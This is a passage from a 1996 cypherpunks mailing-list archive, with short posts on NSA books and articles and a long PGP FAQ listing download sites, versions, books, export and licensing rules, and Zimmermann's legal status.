course (I lived for a year near Monaco, so I knew this would be the case).

Frequent travellers to Europe will no doubt confirm what I'm saying. I
travelled to dozens of countries in Europe a while back, and never was
checked at any borders, save for a quick glance at my passport.

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Mon, 15 Jan 96 10:41:13 PST
To: tcmay@got.net
Subject: Re: New Puzzle Palace? Re: CAQ - Secret ...
In-Reply-To: <ad1fd03c000210044092@[205.199.118.202]>
Message-ID: <9601151840.AA00925@w20-575-119.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Schneier has done a major rewrite, or at least included *lots* of new
info.  I haven't gotten a copy yet, but I saw one, and it was twice as
thick as the first version.

Now I just need the money to buy the book...

-James



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 15 Jan 96 15:43:58 PST
To: s1018954@aix2.uottawa.ca
Subject: Re: New Puzzle Palace?
In-Reply-To: <Pine.3.89.9601151533.C28480-0100000@aix2.uottawa.ca>
Message-ID: <Pine.BSD.3.91.960115132743.13743A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  I believe the co-author is Wayne Madsen, who's written: 
 
          Handbook of Personal Data Protection 
 
          Stockton Press (an imprint of Groves Dictionaries, 
            which is in turn a division of Macmillan Publica- 
            tions, Ltd) 
 
          1992 
 
          1026 pages 
 
          US $170 
 
          ISBN 1 56157 046 0 
 
          1 800 221 2123. 
 
 
  Please see Jyri Kaljundi's message below.  Madsen is interviewed 
  in Web Review's series on NSA's subversion of the private sector, 
  here at home as well as abroad. 
 
 
  Cordially, 
 
  Jim 
 
 
 
  INCLOSURE 1: 
 
Date: Sun, 14 Jan 1996 18:27:59 +0200 (EET)
From: Jyri Kaljundi <jk@digit.ee>
To: cypherpunks@toad.com
Subject: GNN on Crypto


Global Network Navigator Web Review (http://gnn.com/wr/) has their main 
story this week on crypto. The articles are:

Spymaster meets webmaster:NSA's Fortezza: stronger encryption or Internet 
spy strategy
http://gnn.com/gnn/wr/96/01/12/features/nsa/index.html

The Seduction of Crypto AG: How the NSA held the keys to a top-selling 
encryption machine
http://gnn.com/gnn/wr/96/01/12/features/nsa/crypto.html

Familiar faces, familiar places: Look who's working to implement Fortezza 
in 

the US and Europe 
http://gnn.com/gnn/wr/96/01/12/features/nsa/triteal.html

What's that smell: Is the NSA sniffing your email?
[http://gnn.com/gnn/wr/96/01/12/features/nsa/sniff.html

A back door for the NSA: Balancing the need for intelligence with privacy
http://gnn.com/gnn/wr/96/01/12/features/nsa/conclude.html

Juri Kaljundi
jk@digit.ee
Digiturg http://www.digit.ee/
 
 
  INCLOSURE 2: 
 
 
Date: Mon, 15 Jan 1996 15:21:44 -0500 (EST)
From: s1018954@aix2.uottawa.ca
To: grimm@MIT.EDU
Cc: cypherpunks@toad.com
Subject: Re: New Puzzle Palace? 



On Mon, 15 Jan 1996 grimm@MIT.EDU wrote:

> Schneier has done a major rewrite, or at least included *lots* of new
> info.  I haven't gotten a copy yet, but I saw one, and it was twice as
> thick as the first version.
> 
Huh? Oh you mean Applied Crypto 2. I was asking about Puzzle Palace 2 by 
Bamford, which I saw listed in AC2's bibliography. Can't seem to find it.
I was just wondering if it's worth ordering. (Maybe I wasn't clear in my 
last msg.) 

Btw, anyone know what else Bamford's been doing since he wrote Puzzle Palace 1,
in '82? Any other books, articles? He's a Washington lawyer, right? I 
hear the new edition has a collaborating author; anything on him? Curious.

TIA.
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Mon, 15 Jan 96 13:50:20 PST
To: cypherpunks@toad.com
Subject: Where to get PGP FAQ update
Message-ID: <Pine.SUN.3.91.960115134703.2645A-100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) FAQ

Revised 14 January 1996

Disclaimer -- I haven't recently verified all of the information in this
file, and much of it is probably out of date.  If you discover inaccurate or
out of date information, please let me know at mpj@netcom.com.  Thanks!

For questions not covered here, please see the MAIN alt.security.pgp FAQ at
rtfm.mit.edu.


 WHAT IS THE LATEST VERSION OF PGP?

 Platform(s)       Latest Version        Distribution File Names
__________________________________________________________________________
|                |                     |                                 |
|DOS, Unix,      | Viacrypt PGP 2.7.1  | disk sets                       |
|Mac, Windows,   |                     |                                 |
|or WinCIM/CSNav |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Hardware-based  | Viacrypt 2.7.1      | disk sets                       |
|PGP/Token       |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|DOS, Unix, VAX, | MIT PGP 2.6.2       | pgp262.zip  (DOS + docs)        |
|others          |                     | pgp262s.zip (source)            |
|                |                     | pg262s.zip source on CompuServe |
|                |                     | pgp262s.tar.gz (source)         |
|                |                     | pgp262s.tar.Z (source)          |
|                |                     | pgp262dc.zip (documentation)    |
|                |                     | pg262d.zip (docs on CompuServe) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Macintosh       | MIT PGP 2.6.2       | MacPGP2.6.2-130v1.hqx           |
|                | Mac version 1.3.0   | m262pgp.hqx (same as above)     |
|                |                     | MacPGP2.6.2-130v1.source.asc    |
|                |                     | m262pgps.asc (same as above)    |
|                | PGPfone 1.0 beta 5  |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Power Mac       | Zbigniew's "beta"   | Fatmacpgp262b131.sea.hqx        |
|                |                     | f262pgp.hqx (same as above)     |
|                |                     | Fatmacpgp262b131.src.hqx        |
|                |                     | f262pgps.hqx (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                |                     | pgp262-a14-020.lha              |
|                |                     | pgp262-a14-src.lha              |
|                |                     | PGPAmi262is.lha (international) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Atari           | Atari MIT PGP 2.6.2 | pgp262st.zip                    |
|                | Atari International | pgp262ib.zip                    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|OS/2            | MIT PGP 2.6.2       | pgp262-os2.zip                  |
|                |                     | on ftp.gibbon.com               |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Non-USA version | PGP 2.6.2i from     | pgp262i.zip  (DOS executable)   |
|to avoid RSAREF | Stale Schumacher,   | pgp262ix.zip (32-bit DOS)       |
|license.        | Kai Uwe Rommel,     | pgp262i-os2.zip (OS/2 exe)      |
|                | Harald Denker, and  | pgp262ib.zip (Atari)            |
|                | Peter Simons        | PGPAmi262is.lha (Amiga)         |
|                |                     | pgp262is.zip (source)           |
|                |                     | pgp262is.tar.gz (Unix source)   |
|                |                     |                                 |
|                | Canadian "mutant"   | MacPGP262ca124.exe.sea.hqx      |
|                | not for USA use     | MacPGP262ca124.src.sea.hqx      |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Unofficial      | PGP 2.6.2ui         | pgp262iu.zip                    |
|non-USA version | Not for use in the  |                                 |
|fully under Gnu | USA because of      |                                 |
|public license  | probable patent     |                                 |
|(based on 2.3a  | infringement        |                                 |
|code)           | problems.           |                                 |
|________________|_____________________|_________________________________|



BUG


Digital signatures made with keys 2034-2048 bits in length may be corrupt if
made by MIT PGP 2.6.2, but I think this has been fixed in PGP 2.6.2i.  To fix
this in the source code, change the line in function
make_signature_certificate in crypto.c from

        byte inbuf[MAX_BYTE_PRECISION], outbuf[MAX_BYTE_PRECISION];
to
        byte inbuf[MAX_BYTE_PRECISION], outbuf[MAX_BYTE_PRECISION+2];

See also
http://www.ifi.uio.no/~staalesc/PGP/bugs.html. and
http://www.mit.edu:8001/people/warlord/pgp-faq.html


WHERE CAN I GET VIACRYPT PGP?


Viacrypt has versions of PGP complete with licenses for commercial use of the
RSA and IDEA encryption algorithms. Viacrypt PGP comes in executable code
only (no source code), but it is based on (and just as secure as) the
freeware PGP. Viacrypt PGP for Windows is the only real Windows PGP (and even
it is partially a quickwin executable that looks like a DOS port). Still, it
is much better from an interface standpoint than all the others.


Please contact ViaCrypt for pricing (about US $100 up), the latest platforms,
and availablity at 800-536-2664 8:30am to 5:00pm MST, Monday - Friday. They
accept VISA, MasterCard, AMEX and Discover credit cards.


Viacrypt is currently working on preparing the release of version 4.0
(personal) and version 4.0 (business).  The business edition adds a few extra
key management features (like master keys) that are of use to businesses, but
not really useful for persnal email.

               ViaCrypt Products
Mail:          9033 N. 24th Avenue
               Suite 7
               Phoenix AZ 85021-2847
Phone:         (602) 944-0773
Fax:           (602) 943-2601
Internet:      viacrypt@acm.org
Compuserve:    70304.41


WHERE IS PGP ON THE WORLD WIDE WEB?

 * http://web.mit.edu/network/pgp-form.html (U. S. PGP primary distribution
   site)

 * http://web.mit.edu/network/pgpfone (PGP Fone primary distribution site)

 * http://www.ifi.uio.no/~staalesc/PGP/home.html (International PGP
   primary distribution site)

 * http://www.ifi.uio.no/~staalesc/PGP/language.html (Language file master
   list)

 * http://www.epic.org/privacy/tools.html

 * http://rschp2.anu.edu.au:8080/crypt.html

 * http://www.eff.org/pub/Net_info/Tools/Crypto/

 * http://community.net/community/all/home/solano/sbaldwin

 * http://www.cco.caltech.edu/~rknop/amiga_pgp26.html

 * http://www.csua.berkeley.edu/cypherpunks/home.html

 * http://www.leo.org/archive/os2/crypt/

 * http://colossus.net/wepinsto/wshome.html

 * http://www.cs.hut.fi/ssh/crypto/


WHERE CAN I FTP PGP IN NORTH AMERICA?

If you are in the USA or Canada, you can get PGP by following the
instructions in any of:


 * ftp://net-dist.mit.edu/pub/PGP/README

 * ftp://ftp.csn.net/mpj/README.MPJ

 * ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS

 * ftp://ftp.netcom.com/pub/dd/ddt/crypto/READ_ME_FIRST!

 * ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_ftp_instructions.txt

 * ftp://ftp.eff.org

 * Follow the instructions found in README.Dist that you get from one
of:

 * ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist

 * gopher.eff.org, 1/Net_info/Tools/Crypto

 * gopher://gopher.eff.org/11/Net_info/Tools/Crypto

 * http://www.eff.org/pub/Net_info/Tools/Crypto/

 * ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp/

 * ftp://ftp.gibbon.com/pub/pgp/README.PGP

 * http://www.gibbon.com/getpgp.html
   (OS/2 users see also /pub/gcp/gcppgp10.zip)

 * ftp://ftp.wimsey.bc.ca/pub/crypto/software/README


WHERE IS PGP ON COMPUSERVE?


GO NCSAFORUM. Follow the instructions there to gain access to Library 12:
Export Controlled.


Compuserve file names used to be seriously limited, so look for PGP262.ZIP,
PG262S.ZIP (source code), PGP262.GZ (Unix source code) and PG262D.ZIP
(documentation only).



AOL

Go to the AOL software library and search "PGP" or ftp from
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp or another site listed above
or below.


It is possible to get PGP from ftp sites with hidden directories
with the following trick:  (1) View the README file with the hidden
directory name in it, then quickly (2) Start a new ftp connection,
specifiying the hidden directory name with the ftp site's address, like
ftp.csn.net/mpj/I_will_not_export/crypto_xxxxxxx (where the xxxxxxx is
replaced with the current character string).


WHAT BULLETIN BOARD SYSTEMS CARRY PGP?


MANY BBS carry PGP. The following carry recent versions of PGP and allow free
downloads of PGP.


 * US

   303-343-4053 Hacker's Haven, Denver, CO Lots of crypto stuff here.

   303-772-1062 Colorado Catacombs BBS, Longmont CO
   8 data bits, 1 stop, no parity, up to 28,800 bps.
   Use ANSI terminal emulation.
   For free access: log in with your own name, answer the questions.

   314-896-9309 The KATN BBS

   317-887-9568 Computer Virus Research Center (CVRC) BBS, Indianapolis, IN
   Login First Name: PGP  Last Name: USER   Password: PGP

   501-791-0124, 501-791-0125 The Ferret BBS, North Little Rock, AR
   Login name: PGP USER Password: PGP

   506-457=0483 Data Intelligence Group Corporation BBS

   508-668-4441 Emerald City, Walpole, MA

   601-582-5748 CyberGold BBS

   612-690-5556, !CyBERteCH SeCURitY BBS! Minneapolis MN, - write a
   letter to the sysop requesting full access.

   914-667-4567 Exec-Net, New York, NY

   915-587-7888, Self-Governor Information Resource, El Paso, Texas

 * UK

   01273-688888

 * GERMANY

   +49-781-38807 MAUS BBS, Offenburg - angeschlossen an das MausNet

   +49-521-68000 BIONIC-BBS Login: PGP


WHERE CAN I FTP PGP CLOSE TO ME?

 * AU

ftp://ftp.cc.adfa.oz.au/pub/security/pgp23/macpgp2.3.cpt.hqx
ftp://ftp.iinet.net.au:mirrors/pgp(Australia ONLY)
ftp://plaza.aarnet.edu.au/micros/mac/umich/misc/documentation/howtomacpgp2.7.txt

 * DE

ftp://ftp.informatik.tu-muenchen.de/pub/comp/os/os2/crypt
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp
ftp://ftp.fu-berlin.de/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz
ftp://ftp.tu-clausthal.de/pub/atari/misc/pgp/pgp261b.lzh
ftp://ftp.uni-kl.de/pub/aminet/util/crypt
ftp://ftp.uni-paderborn.de/pub/aminet/util/crypt
ftp://ftp.westfalen.de/pd/Atari/Pgp(Atari)
ftp://tupac-amaru.informatik.rwth-aachen.de

 * ES

ftp://goya.dit.upm.es
ftp://encomix.es/pub/pgp/pgp262i/pgp262i.zip

 * IT

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP

 * FI

ftp://ftp.funet.fi/pub/crypt

 * NL

ftp://ftp.nl.net/pub/crypto/pgp
ftp.nic.surfnet.nl/surfnet/net-security/encryption/pgp

 * NZ

ftp://ftphost.vuw.ac.nz
ftp://rs950.phys.waikato.ac.nz/pub/incoming/pgp(New Zealand ONLY)

 * SE

ftp://leif.thep.lu.se

 * TW

ftp://nctuccca.edu.tw/PC/wuarchive/pgp/

 * UK

ftp://ftp.demon.co.uk/pub/amiga/pgp
ftp://ftp.ox.ac.uk/pub/crypto/pgp
ftp://src.doc.ic.ac.uk/aminet/amiga-boing
ftp://unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp

 * USA

ftp://atari.archive.umich.edu/pub/atari/Utilities/pgp261st.zip (Atari)
ftp://ftp.leo.org/pub/comp/os/os2/crypt
ftp://wuarchive.wustl.edu/pub/aminet/util/crypt
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.exe.sea.hqx
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.src.sea.hqx

 * ZA

ftp://ftp.ee.und.ac.za/pub/crypto/pgp
 /pub/archimedes
 /pub/pgp
 /pub/mac/MacPGP



HOW CAN I GET PGP BY EMAIL?


If you have access to email, but not to ftp, send a message saying
"help" to
ftpmail@decwrl.dec.com, mailserv@nic.funet.fi,
or  ftp-request@netcom.com

 To get pgp 2.6.2i by email:
  Send a message to
pgp@hypnotech.com with your request in the
  Subject: field.

Subject What you will get GET pgp262i.zip MS-DOS executable
(uuencoded) GET pgp262is.zip MS-DOS source code (uuencoded) GET
pgp262is.tar.gz UNIX source code (uuencoded)

For FAQ
information, send e-mail to mail-server@rtfm.mit.edu
with
    send usenet/news.answers/ftp-list/faq
in the body of the message.


WHERE IS MACPGP?

ftp://ftp.csn.net/mpj/README.MPJ
ftp://ftp.confusion.net/pub/pgp/mac-pgp/README
ftp://highway.alinc.com/users/jordyn/mac-pgp/README
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS


WHERE IS VAX PGP?


Get the full PGP distribution, then get VAXPGP262.TAR.Z from the
berkeley site for additional files needed to compile PGP for the VAX and
a precompiled version for VAX/VMS 5.5-2.


WHERE CAN I GET MORE PGP INFORMATION?

http://www.csn.net/~mpj
ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt
ftp://starfire.ne.uiuc.edu/preston/pgpquick.ps(and pgpquick.doc)
http://www.prairienet.org/~jalicqui/
http://www.mit.edu:8001/people/warlord/pgp-faq.html
http://draco.centerline.com:8080/~franl/crypto.html
http://draco.centerline.com:8080/~franl/pgp/bug0.html
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa_paper.ps.gz
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa.paper
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
Email  pgp-help@hks.net
ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt
ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-08.txt
http://www.cis.ohio-state.edu/
ftp://ftp.csn.net/mpj/public/pgp/MacPGP262_manual.sit.hqx
http://www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
http://web.cnam.fr/Network/Crypto/(c'est en fran&ccedil;ais)
http://web.cnam.fr/Network/Crypto/survey.html(en anglais)
http://www2.hawaii.edu/~phinely/MacPGP-and-AppleScript-FAQ.html
ftp://ftp.prairienet.org/pub/providers/pgp/pgpbg11.asc(Beginner's Guide)
http://pluto.cc.umr.edu/~steve/Privacy_Page.html/Where_is_PGP.html
http://www.netresponse.com/zldf
http://bookweb.cwis.uci.edu:8042/Orders/ubipgp.html
http://www.geopages.com/Athens/1802/pgpfaq.html
http://www.pgp.net/pgp
http://www.sydney.sterling.com:8080/~ggr/pgpmoose.html

Beginner's Guide: send email to slutsky@lipschitz.sfasu.edu, subject: bg2pgp


WHAT ARE SOME GOOD PGP BOOKS?
      Protect Your Privacy: A Guide for PGP Users
      by William Stallings
      Prentice Hall PTR
      ISBN 0-13-185596-4
      US $19.95
      This is a good technical manual for PGP for most users, and makes a
      better reference than the "official" documentation that comes with PGP.
      I recommend it highly.

      PGP: Pretty Good Privacy
      by Simson Garfinkel
      O'Reilly & Associates, Inc.
      ISBN 1-56592-098-8
      US $24.95

      E-Mail Security: How to Keep Your Electronic Mail Private
      "Covers PGP/PEM"
      by Bruce Schneier
      Wiley Publishing

      The Computer Privacy Handbook: A Practical Guide to E-Mail Encryption,
      Data Protection, and PGP PRivacy Software
      by Andre Bacard
      Peachpit Press
      ISBN 1-56609-171-3
      US $24.95
      800-283-9444 or 510-548-4393
      This is an interesting book on the sociology and politics of privacy in
      the computer age as well as a practical manual on using PGP.  Must
      reading for all members of Congress, presidential staff, members of
      Parliament, and ordinary citizens who would like to take reasonable
      steps to protect themselves from some forms of crime that have been
      made easy by technology.

      THE OFFICIAL PGP USER'S GUIDE
      by Philip R. Zimmerman
      MIT Press
      April 1995 - 216 pp. - paper - US $14.95 - ISBN 0-262-74017-6 ZIMPP
      Standard PGP documentation neatly typeset and bound.

      PGP SOURCE CODE AND INTERNALS
      by Philip R. Zimmerman
      April 1995 - 804 pp. -
      US $55.00 - 0-262-24039-4 ZIMPH
      This is a handy printed reference with commented source code for PGP
      2.6.2 with great educational value.  This is a great way to study some
      of the computer science and information theory behind the world's best
      email privacy tool without having either a computer or reams of
      printouts handy.
      Recommended reading on long airline flights for serious students of
      computer science and computer security.

      Ordering information for the last two books:
      Call US Toll Free 1-800-356-0343 or 617-625-8569.
      Cite code 5CSC and number 661.
      Allow 4-6 weeks for delivery within North America.
      Allow 8-12 weeks for delivery outside of North America.

      How to Use PGP, 61 pages,  (Pub #121) from the Superior
      Broadcasting Company,
      Box 1533-N, Oil City, PA 16301, phone: (814) 678-8801 (about US
      $10-$13).


WHERE CAN I GET PGP LANGUAGE MODULES?

These are suitable for most PGP versions.

http://www.ifi.uio.no/~staalesc/PGP/language.html
ftp://ftp.ifi.uio.no/pub/pgp/doc/

 * German

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha
ftp://ftp.informatik.uni-hamburg.de:/pub/virus/crypt/pgp/language/pgp_german.asc
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pgp262i-german.zip

 * Italian

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz</A

 *

ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

 * Japanese

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

 * Lithuanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

 * Norwegian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_norwegian.tar.gz
ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26i_norwegian.zip

 * Romanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_romanian.tar.gz
ftp://ftp.encomix.es/pub/pgp/lang/pgp-romanian.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/ro_2.6.2.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/language.txt

 * Russian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

 * Spanish

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz
ftp://ftp.encomix.es/pub/pgp/lang/pgp262i-spanish.zip

 * Swedish

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt


IS PGP MORALLY RIGHT?

PGP itself is morally neutral. What you do with it is not.  Protecting
privacy, prevention of criminal theft, and taking due diligence to protect
certain business information (like credit card numbers, customer lists, etc.)
are good uses for PGP. Concealing criminal or other immoral activity is
wrong. You can fool the police some of the time, but you can't fool God.


IS PGP LEGAL?


Pretty Good Privacy is legal if you follow these rules:

 * Don't export PGP from the USA except to Canada, or from Canada except to
the USA, without a license.

 * If you are in the USA, use either Viacrypt PGP (licensed for commercial
use) or MIT PGP using RSAREF (limited to personal, noncommercial use).
Outside of the USA, where RSA is not patented, you may prefer to use a
version of PGP (2.6.i) that doesn't use RSAREF to avoid the restrictions of
that license.

 * If you are in a country where the IDEA cipher patent holds in software
(including the USA, Canada, and some countries in Europe), make sure you are
licensed to use the IDEA cipher commercially before using PGP commercially.
(No separate license is required to use the freeware PGP for personal,
noncommercial use). For direct IDEA licensing, contact Ascom Systec.

Ascom Systec has taken over the distribution of IDEA licenses effective April
1, 1995. Erhard Widmer is the person responsible for the sales aspects, and
Peter Hartmann is responsible for the technical aspects. They can be reached
as follows:

Erhard Widmer,  Ascom Systec AG, Dep't. CMVV      Phone  +41 64 56
59 83
Peter Hartmann, Ascom Systec AG, Dep't. CMN       Phone  +41 64 56 59 45
Fax:            +41 64 56 59 90
e-mail:         IDEA@ascom.ch
Mail address:   Gewerbepark, CH-5506 Maegenwil (Switzerland)


 * Don't sell PGP based on Philip Zimmermann's source code in North America
unless you are reselling for Viacrypt (because they have an exclusive
marketing agreement on Philip Zimmermann's copyrighted code).  (Selling
shareware/freeware disks or connect time is OK). This restriction does not
apply to PGP 3.0, since it is a complete rewrite by Colin Plumb. Distribution
and use restrictions on that version are still to be determined.

 * If you modify PGP (other than porting it to another platform or adapting
it to another compiler), don't call it PGP (TM) or Pretty Good Privacy (TM)
without Philip Zimmermann's permission.


WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?

Philip Zimmermann was under investigation for alleged violation of export
regulations, with a grand jury hearing evidence for about 28 months, ending
11 January 1996. The Federal Government chose not to comment on why it
decided to not prosecute, nor is it likely to.  The Commerce Secretary stated
that he would seek relaxed export controls for cryptographic products, since
studies show that U. S. industry is being harmed by current regulations.
Philip endured some serious threats to his livelihood and freedom, as well as
some very real legal expenses, for the sake of your right to electronic
privacy.

Although there was no direct and open legal battle, there was a lot of behind
the scenes work by Phil's legal team, headed by Philip L. Dubois
(dubois@dubois.com). GREAT JOB!  If you ever are in the situation of needing
a good lawyer to help you with similar Federal harassment, consider yourself
fortunate if Mr. Dubois will take your case.

Philip Zimmermann is breathing more easily these days, still a free man and
able to work to support his family.  The battle is won, but the war is not
over. The regulations that caused him so much grief and which continue to
dampen cryptographic development, harm U. S. industry, and do violence to the
U. S. National Security by eroding the First Ammendment of the U. S.
Constitution and encouraging migration of cryptographic industry outside of
the U. S. A. are still on the books.  If you are a U. S. Citizen, please
write to your U. S. Senators, Congressional Representative, President, and
Vice President pleading for a more sane and fair cryptographic policy.


WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?

http://www.ifi.uio.no/~staalesc/AutoPGP.html
http://www.dayton.net/~cwgeib
ftp://oak.oakland.edu/SimTel/msdos/security/apgp22b.zip
ftp://oak.oakland.edu/SimTel/win3/security/pgpw40.zip
http://alpha.netaccess.on.ca/~spowell/crypto/pwf31.zip
ftp://ftp.netcom.com/pub/dc/dcosenza/pgpw40.zip
ftp://Sable.ox.ac.uk/pub
http://www.firstnet.net/~cwgeib/welcom.html
ftp://ftp.netcom.com/pub/ec/ecarp/pgpwind.zip
http://www.eskimo.com/~joelm(Private Idaho)
ftp://ftp.eskimo.com/~joelm
http://www.xs4all.nl/~paulwag/security.htm
http://www.LCS.com/winpgp.html
ftp://mirrors.aol.com/mir01/circa/pub/pc/win3/util/pwf31.zip
http://netaccess.on.ca/~rbarclay/index.html
http://netaccess.on.ca/~rbarclay/pgp.html
ftp://ftp.leo.org/pub/comp/os/os2/crypt/gcppgp10.zip
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pmpgp.zip
http://iquest.com/~aegisrcs

    Compuserve:
    Library 3, European Forum.
    Library 6, NCSA Forum
    PCWorld Online Forum.
    WUGNET Forum.
    WinShare Forum

See also the BBS list for PGP, above.


WHERE CAN I GET THE MACPGP KIT?

ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/MacPGPkit1.6.sit

OTHER MAC ADD-ONS

ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/ChainMail.0.7.sit
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/Eudora->PGPScripts1.5.sit
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/pgp/mac/AppleScripts


WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE?

PGP can do conventional encryption only of a file (-c) option, but
you might want to investigate some of the other alternatives if you do
this a lot. Alternatives include Quicrypt and Atbash2 for DOS, DLOCK2 for
DOS & UNIX, Curve Encrypt (for the Mac), HPACK (many platforms), and a
few others.

Quicrypt is interesting in that it comes in two flavors:
shareware exportable and registered secure. Atbash2 is interesting in
that it generates ciphertext that can be read over the telephone or sent
by Morse code. DLOCK is a no-frills strong encryption program with
complete source code. Curve Encrypt has certain user-friendliness
advantages. HPACK is an archiver (like ZIP or ARC), but with strong
encryption. A couple of starting points for your search are:

ftp://ftp.csn.net/mpj/qcrypt11.zip
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/file/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/
ftp://ftp.csn.net/mpj/README for the ???????)
ftp://ftp.miyako.dorm.duke.edu/mpj/crypto/file/


HOW DO I SECURELY DELETE FILES (DOS)?

If you have the Norton Utilities, Norton WipeInfo is pretty good. I use
DELETE.EXE in del110.zip, which is really good at deleting existing files,
but doesn't wipe "unused" space.

ftp://ftp.csn.net/mpj/public/del120.zip
ftp://ftp.demon.co.uk/pub/ibmpc/security/realdeal.zip


WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE?

The nature of Windows is that it can swap any memory to disk at any time,
meaning that all kinds of interesting things could end up in your swap file.

ftp://ftp.firstnet.net/pub/windows/winpgp/wswipe.zip


WHERE DO I GET PGPfone(tm)?

PGPfone is in beta test for Macintosh users. A Windows 95 version is
being developed.

http://web.mit.edu/network/pgpfone
ftp://net-dist.mit.edu/pub/PGPfone/README
ftp.hacktic.nl/pub/pgp/pgpfone


WHERE DO I GET NAUTILUS?

Bill Dorsey, Pat Mullarky, and Paul Rubin have come out with a program called
Nautilus that enables you to engage in secure voice conversations between
people with multimedia PCs and modems capable of at least 7200 bps (but 14.4
kbps is better). See

ftp://ripem.msu.edu/pub/crypt/GETTING_ACCESS
ftp://ripem.msu.edu/pub/crypt/other/nautilus-phone-0.9.2-source.tar.gz
ftp://ftp.csn.net/mpj/README
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/voice/naut092.zip
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
